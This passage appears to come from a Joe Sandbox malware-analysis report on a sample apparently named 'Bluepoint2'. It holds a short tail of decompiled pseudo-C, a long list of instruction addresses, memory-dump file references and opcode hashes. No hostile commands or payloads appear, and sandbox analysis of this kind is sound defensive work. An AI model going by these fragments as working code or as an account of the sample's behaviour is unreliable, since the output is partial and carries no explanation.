								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                                                    0x00000000
                                                                                                                                    0x00406d5f
                                                                                                                                    0x00406d5f
                                                                                                                                    0x00406d64
                                                                                                                                    0x00406ddb
                                                                                                                                    0x00406de2
                                                                                                                                    0x00406dec
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073cb
                                                                                                                                    0x004073ce
                                                                                                                                    0x004073ce
                                                                                                                                    0x004073d4
                                                                                                                                    0x004073da
                                                                                                                                    0x004073e0
                                                                                                                                    0x004073fa
                                                                                                                                    0x004073fd
                                                                                                                                    0x00407403
                                                                                                                                    0x0040740e
                                                                                                                                    0x00407410
                                                                                                                                    0x004073e2
                                                                                                                                    0x004073e2
                                                                                                                                    0x004073f1
                                                                                                                                    0x004073f5
                                                                                                                                    0x004073f5
                                                                                                                                    0x0040741a
                                                                                                                                    0x00407441
                                                                                                                                    0x00407441
                                                                                                                                    0x00407447
                                                                                                                                    0x00407447
                                                                                                                                    0x00000000
                                                                                                                                    0x0040741c
                                                                                                                                    0x0040741c
                                                                                                                                    0x00407420
                                                                                                                                    0x004075cf
                                                                                                                                    0x00000000
                                                                                                                                    0x004075cf
                                                                                                                                    0x0040742c
                                                                                                                                    0x00407433
                                                                                                                                    0x0040743b
                                                                                                                                    0x0040743e
                                                                                                                                    0x00000000
                                                                                                                                    0x0040743e
                                                                                                                                    0x00406d66
                                                                                                                                    0x00406d66
                                                                                                                                    0x00406d6a
                                                                                                                                    0x00406d72
                                                                                                                                    0x00406d75
                                                                                                                                    0x00406d77
                                                                                                                                    0x00406d7a
                                                                                                                                    0x00406d7c
                                                                                                                                    0x00406d81
                                                                                                                                    0x00406d84
                                                                                                                                    0x00406d8b
                                                                                                                                    0x00406d92
                                                                                                                                    0x00406d95
                                                                                                                                    0x00406da0
                                                                                                                                    0x00406da8
                                                                                                                                    0x00406da8
                                                                                                                                    0x00406da2
                                                                                                                                    0x00406da2
                                                                                                                                    0x00406da2
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406daf
                                                                                                                                    0x00406dcd
                                                                                                                                    0x00406dcf
                                                                                                                                    0x00406fa2
                                                                                                                                    0x00406fa2
                                                                                                                                    0x00406fa5
                                                                                                                                    0x00406fa8
                                                                                                                                    0x00406fab
                                                                                                                                    0x00406fae
                                                                                                                                    0x00406fb1
                                                                                                                                    0x00406fb4
                                                                                                                                    0x00406fb7
                                                                                                                                    0x00406fba
                                                                                                                                    0x00406fc0
                                                                                                                                    0x00406fd8
                                                                                                                                    0x00406fdb
                                                                                                                                    0x00406fde
                                                                                                                                    0x00406fe1
                                                                                                                                    0x00406fe1
                                                                                                                                    0x00406fe4
                                                                                                                                    0x00406fea
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fc2
                                                                                                                                    0x00406fca
                                                                                                                                    0x00406fcf
                                                                                                                                    0x00406fd1
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406fd3
                                                                                                                                    0x00406ff4
                                                                                                                                    0x00406ff7
                                                                                                                                    0x00406f9a
                                                                                                                                    0x00406fa0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ff9
                                                                                                                                    0x00406f75
                                                                                                                                    0x00406f79
                                                                                                                                    0x00407581
                                                                                                                                    0x00000000
                                                                                                                                    0x00407581
                                                                                                                                    0x00406f7f
                                                                                                                                    0x00406f82
                                                                                                                                    0x00406f85
                                                                                                                                    0x00406f89
                                                                                                                                    0x00406f8c
                                                                                                                                    0x00406f92
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f94
                                                                                                                                    0x00406f97
                                                                                                                                    0x00000000
                                                                                                                                    0x00406f97
                                                                                                                                    0x00406db1
                                                                                                                                    0x00406db1
                                                                                                                                    0x00406db4
                                                                                                                                    0x00406dba
                                                                                                                                    0x00406dbc
                                                                                                                                    0x00406dbc
                                                                                                                                    0x00406dbf
                                                                                                                                    0x00406dc2
                                                                                                                                    0x00406dc4
                                                                                                                                    0x00406dc5
                                                                                                                                    0x00406dc8
                                                                                                                                    0x00406e35
                                                                                                                                    0x00406e35
                                                                                                                                    0x00406e39
                                                                                                                                    0x00406e3c
                                                                                                                                    0x00406e3f
                                                                                                                                    0x00406e42
                                                                                                                                    0x00406e45
                                                                                                                                    0x00406e46
                                                                                                                                    0x00406e49
                                                                                                                                    0x00406e4b
                                                                                                                                    0x00406e51
                                                                                                                                    0x00406e54
                                                                                                                                    0x00406e57
                                                                                                                                    0x00406e5a
                                                                                                                                    0x00406e5d
                                                                                                                                    0x00406e63
                                                                                                                                    0x00406e7f
                                                                                                                                    0x00406e82
                                                                                                                                    0x00406e85
                                                                                                                                    0x00406e88
                                                                                                                                    0x00406e8f
                                                                                                                                    0x00406e95
                                                                                                                                    0x00406e99
                                                                                                                                    0x00406e65
                                                                                                                                    0x00406e65
                                                                                                                                    0x00406e69
                                                                                                                                    0x00406e71
                                                                                                                                    0x00406e76
                                                                                                                                    0x00406e78
                                                                                                                                    0x00406e7a
                                                                                                                                    0x00406e7a
                                                                                                                                    0x00406ea3
                                                                                                                                    0x00406ea6
                                                                                                                                    0x00406e1d
                                                                                                                                    0x00406e1d
                                                                                                                                    0x00406e23
                                                                                                                                    0x00406ed6
                                                                                                                                    0x00406edc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ede
                                                                                                                                    0x00406ee1
                                                                                                                                    0x00406ee4
                                                                                                                                    0x00406ee7
                                                                                                                                    0x00406eea
                                                                                                                                    0x00406eed
                                                                                                                                    0x00406ef0
                                                                                                                                    0x00406ef3
                                                                                                                                    0x00406ef6
                                                                                                                                    0x00406efc
                                                                                                                                    0x00406f14
                                                                                                                                    0x00406f17
                                                                                                                                    0x00406f1a
                                                                                                                                    0x00406f1d
                                                                                                                                    0x00406f1d
                                                                                                                                    0x00406f20
                                                                                                                                    0x00406f26
                                                                                                                                    0x00406efe
                                                                                                                                    0x00406efe
                                                                                                                                    0x00406f06
                                                                                                                                    0x00406f0b
                                                                                                                                    0x00406f0d
                                                                                                                                    0x00406f0f
                                                                                                                                    0x00406f0f
                                                                                                                                    0x00406f30
                                                                                                                                    0x00406f33
                                                                                                                                    0x00406eb1
                                                                                                                                    0x00406eb5
                                                                                                                                    0x00407575
                                                                                                                                    0x00000000
                                                                                                                                    0x00407575
                                                                                                                                    0x00406ebb
                                                                                                                                    0x00406ebe
                                                                                                                                    0x00406ec1
                                                                                                                                    0x00406ec5
                                                                                                                                    0x00406ec8
                                                                                                                                    0x00406ece
                                                                                                                                    0x00406ed0
                                                                                                                                    0x00406ed0
                                                                                                                                    0x00406ed3
                                                                                                                                    0x00406ed3
                                                                                                                                    0x00406f33
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3a
                                                                                                                                    0x00406f3e
                                                                                                                                    0x00406f3e
                                                                                                                                    0x00406f41
                                                                                                                                    0x00406f44
                                                                                                                                    0x00406f48
                                                                                                                                    0x0040758d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040758d
                                                                                                                                    0x00406f4e
                                                                                                                                    0x00406f51
                                                                                                                                    0x00406f54
                                                                                                                                    0x00406f57
                                                                                                                                    0x00406f5a
                                                                                                                                    0x00406f5d
                                                                                                                                    0x00406f60
                                                                                                                                    0x00406f62
                                                                                                                                    0x00406f65
                                                                                                                                    0x00406f68
                                                                                                                                    0x00406f6b
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x00406f6d
                                                                                                                                    0x0040710a
                                                                                                                                    0x0040710a
                                                                                                                                    0x0040710d
                                                                                                                                    0x0040710d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040710d
                                                                                                                                    0x00406e2f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406eac
                                                                                                                                    0x00406df8
                                                                                                                                    0x00406dfc
                                                                                                                                    0x00407569
                                                                                                                                    0x004075e5
                                                                                                                                    0x004075ed
                                                                                                                                    0x004075f4
                                                                                                                                    0x004075f6
                                                                                                                                    0x004075fd
                                                                                                                                    0x00407601
                                                                                                                                    0x00407601
                                                                                                                                    0x00406e02
                                                                                                                                    0x00406e05
                                                                                                                                    0x00406e08
                                                                                                                                    0x00406e0c
                                                                                                                                    0x00406e0f
                                                                                                                                    0x00406e15
                                                                                                                                    0x00406e17
                                                                                                                                    0x00406e17
                                                                                                                                    0x00406e1a
                                                                                                                                    0x00000000
                                                                                                                                    0x00406e1a
                                                                                                                                    0x00406ea6
                                                                                                                                    0x00406daf
                                                                                                                                    0x00406be3
                                                                                                                                    0x00406be3
                                                                                                                                    0x00406bec
                                                                                                                                    0x004075fa
                                                                                                                                    0x004075fa
                                                                                                                                    0x00000000
                                                                                                                                    0x004075fa
                                                                                                                                    0x00406bf2
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bfd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c06
                                                                                                                                    0x00406c09
                                                                                                                                    0x00406c0c
                                                                                                                                    0x00406c10
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c16
                                                                                                                                    0x00406c19
                                                                                                                                    0x00406c1b
                                                                                                                                    0x00406c1c
                                                                                                                                    0x00406c1f
                                                                                                                                    0x00406c21
                                                                                                                                    0x00406c22
                                                                                                                                    0x00406c24
                                                                                                                                    0x00406c27
                                                                                                                                    0x00406c2c
                                                                                                                                    0x00406c31
                                                                                                                                    0x00406c3a
                                                                                                                                    0x00406c4d
                                                                                                                                    0x00406c50
                                                                                                                                    0x00406c5c
                                                                                                                                    0x00406c84
                                                                                                                                    0x00406c86
                                                                                                                                    0x00406c94
                                                                                                                                    0x00406c94
                                                                                                                                    0x00406c98
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c88
                                                                                                                                    0x00406c88
                                                                                                                                    0x00406c8b
                                                                                                                                    0x00406c8c
                                                                                                                                    0x00406c8c
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c88
                                                                                                                                    0x00406c62
                                                                                                                                    0x00406c67
                                                                                                                                    0x00406c67
                                                                                                                                    0x00406c70
                                                                                                                                    0x00406c78
                                                                                                                                    0x00406c7b
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c81
                                                                                                                                    0x00406c81
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c81
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c9e
                                                                                                                                    0x00406c9e
                                                                                                                                    0x00406ca2
                                                                                                                                    0x0040754e
                                                                                                                                    0x00000000
                                                                                                                                    0x0040754e
                                                                                                                                    0x00406cab
                                                                                                                                    0x00406cbb
                                                                                                                                    0x00406cbe
                                                                                                                                    0x00406cc1
                                                                                                                                    0x00406cc1
                                                                                                                                    0x00406cc1
                                                                                                                                    0x00406cc4
                                                                                                                                    0x00406cc8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406cca
                                                                                                                                    0x00406cd0
                                                                                                                                    0x00406cfa
                                                                                                                                    0x00406d00
                                                                                                                                    0x00406d07
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d07
                                                                                                                                    0x00406cd6
                                                                                                                                    0x00406cd9
                                                                                                                                    0x00406cde
                                                                                                                                    0x00406cde
                                                                                                                                    0x00406ce9
                                                                                                                                    0x00406cf1
                                                                                                                                    0x00406cf4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d39
                                                                                                                                    0x00406d3f
                                                                                                                                    0x00406d42
                                                                                                                                    0x00406d4f
                                                                                                                                    0x00406d57
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d0e
                                                                                                                                    0x00406d0e
                                                                                                                                    0x00406d12
                                                                                                                                    0x0040755d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040755d
                                                                                                                                    0x00406d1e
                                                                                                                                    0x00406d29
                                                                                                                                    0x00406d29
                                                                                                                                    0x00406d29
                                                                                                                                    0x00406d2c
                                                                                                                                    0x00406d2f
                                                                                                                                    0x00406d32
                                                                                                                                    0x00406d37
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ffe
                                                                                                                                    0x00407002
                                                                                                                                    0x00407020
                                                                                                                                    0x00407023
                                                                                                                                    0x0040702a
                                                                                                                                    0x0040702d
                                                                                                                                    0x00407030
                                                                                                                                    0x00407033
                                                                                                                                    0x00407036
                                                                                                                                    0x00407039
                                                                                                                                    0x0040703b
                                                                                                                                    0x00407042
                                                                                                                                    0x00407043
                                                                                                                                    0x00407045
                                                                                                                                    0x00407048
                                                                                                                                    0x0040704b
                                                                                                                                    0x0040704e
                                                                                                                                    0x0040704e
                                                                                                                                    0x00407053
                                                                                                                                    0x00000000
                                                                                                                                    0x00407053
                                                                                                                                    0x00407004
                                                                                                                                    0x00407007
                                                                                                                                    0x0040700a
                                                                                                                                    0x00407014
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407068
                                                                                                                                    0x0040706c
                                                                                                                                    0x0040708f
                                                                                                                                    0x00407092
                                                                                                                                    0x00407095
                                                                                                                                    0x0040709f
                                                                                                                                    0x0040706e
                                                                                                                                    0x0040706e
                                                                                                                                    0x00407071
                                                                                                                                    0x00407074
                                                                                                                                    0x00407077
                                                                                                                                    0x00407084
                                                                                                                                    0x00407087
                                                                                                                                    0x00407087
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070ab
                                                                                                                                    0x004070af
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070b5
                                                                                                                                    0x004070b9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070bf
                                                                                                                                    0x004070c1
                                                                                                                                    0x004070c5
                                                                                                                                    0x004070c5
                                                                                                                                    0x004070c8
                                                                                                                                    0x004070cc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040711c
                                                                                                                                    0x00407120
                                                                                                                                    0x00407127
                                                                                                                                    0x0040712a
                                                                                                                                    0x0040712d
                                                                                                                                    0x00407137
                                                                                                                                    0x00000000
                                                                                                                                    0x00407137
                                                                                                                                    0x00407122
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407143
                                                                                                                                    0x00407147
                                                                                                                                    0x0040714e
                                                                                                                                    0x00407151
                                                                                                                                    0x00407154
                                                                                                                                    0x00407149
                                                                                                                                    0x00407149
                                                                                                                                    0x00407149
                                                                                                                                    0x00407157
                                                                                                                                    0x0040715a
                                                                                                                                    0x0040715d
                                                                                                                                    0x0040715d
                                                                                                                                    0x00407160
                                                                                                                                    0x00407163
                                                                                                                                    0x00407166
                                                                                                                                    0x00407166
                                                                                                                                    0x00407169
                                                                                                                                    0x00407170
                                                                                                                                    0x00407175
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407203
                                                                                                                                    0x00407203
                                                                                                                                    0x00407207
                                                                                                                                    0x004075a5
                                                                                                                                    0x00000000
                                                                                                                                    0x004075a5
                                                                                                                                    0x0040720d
                                                                                                                                    0x00407210
                                                                                                                                    0x00407213
                                                                                                                                    0x00407217
                                                                                                                                    0x0040721a
                                                                                                                                    0x00407220
                                                                                                                                    0x00407222
                                                                                                                                    0x00407222
                                                                                                                                    0x00407222
                                                                                                                                    0x00407225
                                                                                                                                    0x00407228
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407286
                                                                                                                                    0x00407286
                                                                                                                                    0x0040728a
                                                                                                                                    0x004075b1
                                                                                                                                    0x00000000
                                                                                                                                    0x004075b1
                                                                                                                                    0x00407290
                                                                                                                                    0x00407293
                                                                                                                                    0x00407296
                                                                                                                                    0x0040729a
                                                                                                                                    0x0040729d
                                                                                                                                    0x004072a3
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a5
                                                                                                                                    0x004072a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407056
                                                                                                                                    0x00407056
                                                                                                                                    0x00407059
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407395
                                                                                                                                    0x00407399
                                                                                                                                    0x004073bb
                                                                                                                                    0x004073be
                                                                                                                                    0x004073c8
                                                                                                                                    0x00000000
                                                                                                                                    0x004073c8
                                                                                                                                    0x0040739b
                                                                                                                                    0x0040739e
                                                                                                                                    0x004073a2
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407452
                                                                                                                                    0x00407456
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x00407474
                                                                                                                                    0x0040747b
                                                                                                                                    0x00407482
                                                                                                                                    0x00407489
                                                                                                                                    0x00407489
                                                                                                                                    0x00000000
                                                                                                                                    0x00407489
                                                                                                                                    0x00407458
                                                                                                                                    0x0040745b
                                                                                                                                    0x0040745e
                                                                                                                                    0x00407461
                                                                                                                                    0x00407468
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073af
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407543
                                                                                                                                    0x00407546
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040717d
                                                                                                                                    0x0040717f
                                                                                                                                    0x00407186
                                                                                                                                    0x00407187
                                                                                                                                    0x00407189
                                                                                                                                    0x0040718c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407194
                                                                                                                                    0x00407197
                                                                                                                                    0x0040719a
                                                                                                                                    0x0040719c
                                                                                                                                    0x0040719e
                                                                                                                                    0x0040719e
                                                                                                                                    0x0040719f
                                                                                                                                    0x004071a2
                                                                                                                                    0x004071a9
                                                                                                                                    0x004071ac
                                                                                                                                    0x004071ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407490
                                                                                                                                    0x00407490
                                                                                                                                    0x00407493
                                                                                                                                    0x0040749a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040749f
                                                                                                                                    0x0040749f
                                                                                                                                    0x004074a3
                                                                                                                                    0x004075db
                                                                                                                                    0x00000000
                                                                                                                                    0x004075db
                                                                                                                                    0x004074a9
                                                                                                                                    0x004074ac
                                                                                                                                    0x004074af
                                                                                                                                    0x004074b3
                                                                                                                                    0x004074b6
                                                                                                                                    0x004074bc
                                                                                                                                    0x004074be
                                                                                                                                    0x004074be
                                                                                                                                    0x004074be
                                                                                                                                    0x004074c1
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c4
                                                                                                                                    0x004074c7
                                                                                                                                    0x004074c7
                                                                                                                                    0x004074cb
                                                                                                                                    0x0040752b
                                                                                                                                    0x0040752e
                                                                                                                                    0x00407533
                                                                                                                                    0x00407534
                                                                                                                                    0x00407536
                                                                                                                                    0x00407538
                                                                                                                                    0x0040753b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040753b
                                                                                                                                    0x004074cd
                                                                                                                                    0x004074d3
                                                                                                                                    0x004074d6
                                                                                                                                    0x004074d9
                                                                                                                                    0x004074dc
                                                                                                                                    0x004074df
                                                                                                                                    0x004074e2
                                                                                                                                    0x004074e5
                                                                                                                                    0x004074e8
                                                                                                                                    0x004074eb
                                                                                                                                    0x004074ee
                                                                                                                                    0x00407507
                                                                                                                                    0x0040750a
                                                                                                                                    0x0040750d
                                                                                                                                    0x00407510
                                                                                                                                    0x00407514
                                                                                                                                    0x00407516
                                                                                                                                    0x00407516
                                                                                                                                    0x00407517
                                                                                                                                    0x0040751a
                                                                                                                                    0x004074f0
                                                                                                                                    0x004074f0
                                                                                                                                    0x004074f8
                                                                                                                                    0x004074fd
                                                                                                                                    0x004074ff
                                                                                                                                    0x00407502
                                                                                                                                    0x00407502
                                                                                                                                    0x0040751d
                                                                                                                                    0x00407524
                                                                                                                                    0x00000000
                                                                                                                                    0x00407526
                                                                                                                                    0x00000000
                                                                                                                                    0x00407526
                                                                                                                                    0x00000000
                                                                                                                                    0x004071c2
                                                                                                                                    0x004071c5
                                                                                                                                    0x004071fb
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732b
                                                                                                                                    0x0040732e
                                                                                                                                    0x0040732e
                                                                                                                                    0x00407331
                                                                                                                                    0x00407333
                                                                                                                                    0x004075bd
                                                                                                                                    0x00000000
                                                                                                                                    0x004075bd
                                                                                                                                    0x00407339
                                                                                                                                    0x0040733c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407342
                                                                                                                                    0x00407346
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00407349
                                                                                                                                    0x00000000
                                                                                                                                    0x00407349
                                                                                                                                    0x004071c7
                                                                                                                                    0x004071c9
                                                                                                                                    0x004071cb
                                                                                                                                    0x004071cd
                                                                                                                                    0x004071d0
                                                                                                                                    0x004071d1
                                                                                                                                    0x004071d3
                                                                                                                                    0x004071d5
                                                                                                                                    0x004071d8
                                                                                                                                    0x004071db
                                                                                                                                    0x004071f1
                                                                                                                                    0x004071f6
                                                                                                                                    0x0040722e
                                                                                                                                    0x0040722e
                                                                                                                                    0x00407232
                                                                                                                                    0x0040725e
                                                                                                                                    0x00407260
                                                                                                                                    0x00407267
                                                                                                                                    0x0040726a
                                                                                                                                    0x0040726d
                                                                                                                                    0x0040726d
                                                                                                                                    0x00407272
                                                                                                                                    0x00407272
                                                                                                                                    0x00407274
                                                                                                                                    0x00407277
                                                                                                                                    0x0040727e
                                                                                                                                    0x00407281
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072ae
                                                                                                                                    0x004072b1
                                                                                                                                    0x004072b4
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00407328
                                                                                                                                    0x00000000
                                                                                                                                    0x00407328
                                                                                                                                    0x004072b6
                                                                                                                                    0x004072bc
                                                                                                                                    0x004072bf
                                                                                                                                    0x004072c2
                                                                                                                                    0x004072c5
                                                                                                                                    0x004072c8
                                                                                                                                    0x004072cb
                                                                                                                                    0x004072ce
                                                                                                                                    0x004072d1
                                                                                                                                    0x004072d4
                                                                                                                                    0x004072d7
                                                                                                                                    0x004072f0
                                                                                                                                    0x004072f2
                                                                                                                                    0x004072f5
                                                                                                                                    0x004072f6
                                                                                                                                    0x004072f9
                                                                                                                                    0x004072fb
                                                                                                                                    0x004072fe
                                                                                                                                    0x00407300
                                                                                                                                    0x00407302
                                                                                                                                    0x00407305
                                                                                                                                    0x00407307
                                                                                                                                    0x0040730a
                                                                                                                                    0x0040730e
                                                                                                                                    0x00407310
                                                                                                                                    0x00407310
                                                                                                                                    0x00407311
                                                                                                                                    0x00407314
                                                                                                                                    0x00407317
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072d9
                                                                                                                                    0x004072e1
                                                                                                                                    0x004072e6
                                                                                                                                    0x004072e8
                                                                                                                                    0x004072eb
                                                                                                                                    0x004072eb
                                                                                                                                    0x0040731a
                                                                                                                                    0x00407321
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x004072ab
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00000000
                                                                                                                                    0x00407323
                                                                                                                                    0x00407321
                                                                                                                                    0x00407234
                                                                                                                                    0x00407237
                                                                                                                                    0x00407239
                                                                                                                                    0x0040723c
                                                                                                                                    0x0040723f
                                                                                                                                    0x00407242
                                                                                                                                    0x00407244
                                                                                                                                    0x00407247
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724a
                                                                                                                                    0x0040724d
                                                                                                                                    0x0040724d
                                                                                                                                    0x00407250
                                                                                                                                    0x00407257
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x0040722b
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00000000
                                                                                                                                    0x00407259
                                                                                                                                    0x00407257
                                                                                                                                    0x004071dd
                                                                                                                                    0x004071e0
                                                                                                                                    0x004071e2
                                                                                                                                    0x004071e5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070cf
                                                                                                                                    0x004070d3
                                                                                                                                    0x00407599
                                                                                                                                    0x00000000
                                                                                                                                    0x00407599
                                                                                                                                    0x004070d9
                                                                                                                                    0x004070dc
                                                                                                                                    0x004070df
                                                                                                                                    0x004070e2
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e4
                                                                                                                                    0x004070e7
                                                                                                                                    0x004070ea
                                                                                                                                    0x004070ed
                                                                                                                                    0x004070f0
                                                                                                                                    0x004070f3
                                                                                                                                    0x004070f6
                                                                                                                                    0x004070f7
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070f9
                                                                                                                                    0x004070fc
                                                                                                                                    0x004070ff
                                                                                                                                    0x00407102
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407105
                                                                                                                                    0x00407108
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x0040734c
                                                                                                                                    0x00407350
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407356
                                                                                                                                    0x00407359
                                                                                                                                    0x0040735c
                                                                                                                                    0x0040735f
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407361
                                                                                                                                    0x00407364
                                                                                                                                    0x00407367
                                                                                                                                    0x0040736a
                                                                                                                                    0x0040736d
                                                                                                                                    0x00407370
                                                                                                                                    0x00407373
                                                                                                                                    0x00407374
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407376
                                                                                                                                    0x00407379
                                                                                                                                    0x0040737c
                                                                                                                                    0x0040737f
                                                                                                                                    0x00407382
                                                                                                                                    0x00407385
                                                                                                                                    0x00407389
                                                                                                                                    0x0040738b
                                                                                                                                    0x0040738e
                                                                                                                                    0x00000000
                                                                                                                                    0x00407390
                                                                                                                                    0x00000000
                                                                                                                                    0x00407390
                                                                                                                                    0x0040738e
                                                                                                                                    0x004075c3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bf2

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                                                                    • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                                                                    • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
